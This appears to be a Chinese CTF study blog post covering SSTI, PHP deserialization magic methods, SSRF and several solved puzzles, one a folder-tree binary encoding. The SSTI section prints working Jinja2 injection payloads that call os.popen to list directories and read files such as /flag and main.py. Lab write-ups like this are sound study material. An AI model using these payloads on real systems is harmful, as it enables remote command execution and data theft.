SSTI了解+反序列化了解+SSRF了解+之前的一些题
2024-05-08 20:07:07
文章目录
- SSTI简介
- web361
- web362
- SSTI 命令执行的一些总结
- 反序列化:
- SSRF
- [vnctf2022]Strange flag
- simple_js
- [buuctf]MISC
SSTI简介
SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题,与sql注入类似
web361
名字就是考点
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
web362
与前一题一样
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
SSTI 命令执行的一些总结
SSTI 命令执行的一些总结
ctf中的一些绕过tips
SSTI模板注入绕过(进阶篇)
探测目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% endif %}{% endfor %}
一个个捕获
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat main.py').read()") }}{% endif %}{% endfor %}反序列化:
php反序列化总结
- serialize 将对象格式化成有序的字符串
- unserialize 将字符串还原成原来的对象
- 反序列化中常见的魔术方法
__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发
SSRF
SSRF漏洞原理解析
[vnctf2022]Strange flag
将http全部保存下来,在最后一个包发现这个
`-- New\ folder|-- New\ folder| |-- New\ folder| |-- New\ folder\ (2)| |-- New\ folder\ (3)| `-- New\ folder\ (4)`-- New\ folder\ (2)|-- New\ Folder\ (3)| |-- New\ folder| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(10)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(11)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(12)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(13)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(14)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(15)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(16)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(17)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(18)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(19)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(2)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(20)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(21)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(22)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(23)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(24)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(25)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(26)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(27)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(28)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(29)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(3)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(30)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(31)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(32)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(33)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(34)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(35)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(36)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(37)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(38)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(39)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(4)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(5)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| |-- New\ folder(6)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | | `-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| |-- New\ folder(7)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | | `-- New\ folder| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | | `-- New\ folder| | |-- New\ folder(3)| | `-- New\ folder(4)| |-- New\ folder(8)| | |-- New\ folder| | | |-- New\ folder| | | |-- New\ folder(2)| | | |-- New\ folder(3)| | | | `-- New\ folder| | | `-- New\ folder(4)| | | `-- New\ folder| | `-- New\ folder(2)| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| `-- New\ folder(9)| |-- New\ folder| | |-- New\ folder| | |-- New\ folder(2)| | |-- New\ folder(3)| | | `-- New\ folder| | `-- New\ folder(4)| | `-- New\ folder| `-- New\ folder(2)| |-- New\ folder| |-- New\ folder(2)| |-- New\ folder(3)| | `-- New\ folder| `-- New\ folder(4)| `-- New\ folder|-- New\ folder| |-- New\ folder| |-- New\ folder\ (2)| |-- New\ folder\ (3)| |-- New\ folder\ (4)| `-- New\ folder\ (5)`-- New\ folder\ (2)|-- New\ folder`-- New\ folder\ (2)可以看到,第8行-第572行后面都是四个四个,排列比较整齐。那我们假设有子文件的为1,没子文件的为0。最后二进制转字符
simple_js
源码里有一串编码
转十六进制解不出来,那就试试url编码,将\x转换成%
在转为ascii编码,得到flag
[buuctf]MISC
被劫持的神秘礼物
导出http,翻看文件
MD532位小写加密一下得到flag
SSTI了解+反序列化了解+SSRF了解+之前的一些题相关推荐
- buu(ssti模板注入、ssrf服务器请求伪造)
目录 目录 [CISCN2019 华东南赛区]Web11 [BJDCTF2020]EasySearch [De1CTF 2019]SSRF Me [CSCCTF 2019 Qual]FlaskLigh ...
- Web安全手册(漏洞理解、漏洞利用总结)
0x01 漏洞理解篇(Vulnerability) 前端 跨域安全 后端逻辑 0x02 漏洞利用篇(Exploit) SQL injection - MySQL XSS CSRF SSRF XXE S ...
- CTF萌新入坑指南(web篇)(21.6.5已更新)
图文来自Spirit现役最菜web选手k1ling 20.10.21 --最近忙的要死,校赛被锤爆,,然后课设又要结项,那几天肝代码到很晚,累die,然后答辩,被老师安排的明明白白(还好4.0了 不然 ...
- java 解析sh文件内容_java 文件读取
show me she shell 这是一道tomato师傅出的不完整的java题,java-,java-我恨java┑( ̄Д  ̄)┍ 这是一个题目一是列目录+任意文件读取, 二是垂直越权+CLRF配 ...
- hvv知识点(基础)
hv面知识点整理 又到了每年hvv的时间段了,今年也是报名了hvv行动,然后对于面试还没啥太大的把握,就在此整理总结一些大佬们的hvv面试经验. 1.SQL注入的分类 (1)Bool盲注 (2)时间注 ...
- 区块链常见漏洞万字总结【Web3从业者必备】
区块链常见漏洞列表 网络层 P2P 女巫攻击 日蚀攻击 窃听攻击 拒绝服务攻击 BGP劫持攻击 异形攻击 时间劫持 RPC 窃听攻击 拒绝服务攻击 以太坊黑色情人节漏洞 HTTP输入攻击 跨域钓鱼攻击 ...
- ATTCK红队评估(红日靶场二)
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB.DC.PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修 ...
- 常见的网络安全面试题目(个人总结)
1.常见的漏洞及其利用方式 SQL注入 对于客户端输入的内容没有进行严格的校验,而导致恶意的sql语句被执行,而产生的漏洞. 常见的漏洞类型有报错注入,布尔盲注,时间盲注,联合查询的注入. 报错注入 ...
- 2022年网络安全面试题总结
2022年网络安全最新企业真实面试题 问题1:您之前使用过的安全设备有哪些,说一下您是如何使用的? 答案:我使用过360态势感知(也叫本脑)ids/ips/waf/科来的全流量分析设备等,介绍一个会的 ...
最新文章
- 澳洲服务器拳头账号怎么注册,lol手游东南亚服拳头账号注册教程 东南亚服怎么注册拳头账号[多图]...
- 数据结构与算法(十二):八大经典排序算法再回顾
- python课程推荐-课程推荐:四天人工智能 python入门体验课
- 区块链开发之搭建以太坊私有链
- Android深度探索第四章感想
- Linux学习之Vim编辑器
- php自定义能过滤器,过滤器与自定义过滤器的介绍
- JVM 内存模型与内存分配方式
- 太原工业学院单片机课程设计_单片机智能小车毕业设计论文
- 【Intellij-IDEA系列】IDEA右键没有Git或svn处理方法
- 月入30K 的电子工程师很常见吗,需要具备啥素质才配得上这个薪资
- Python模拟网页form表单提交
- 南京大学计算机系2019复试离散题目-逻辑与推理
- 好莱坞电影调色_好莱坞正式支持电影制作中的开源
- html 隐藏表格某一行,layui怎么隐藏表格行?
- 23-1-18 PDManer 工具
- 利用Dism修复系统步骤,以及dism找不到源文件解决方案
- linux-top命令备忘
- 干货 | 软件工程师必知之事 —— 如何定义自己的职业路线?
- java代码实现炫酷壁纸效果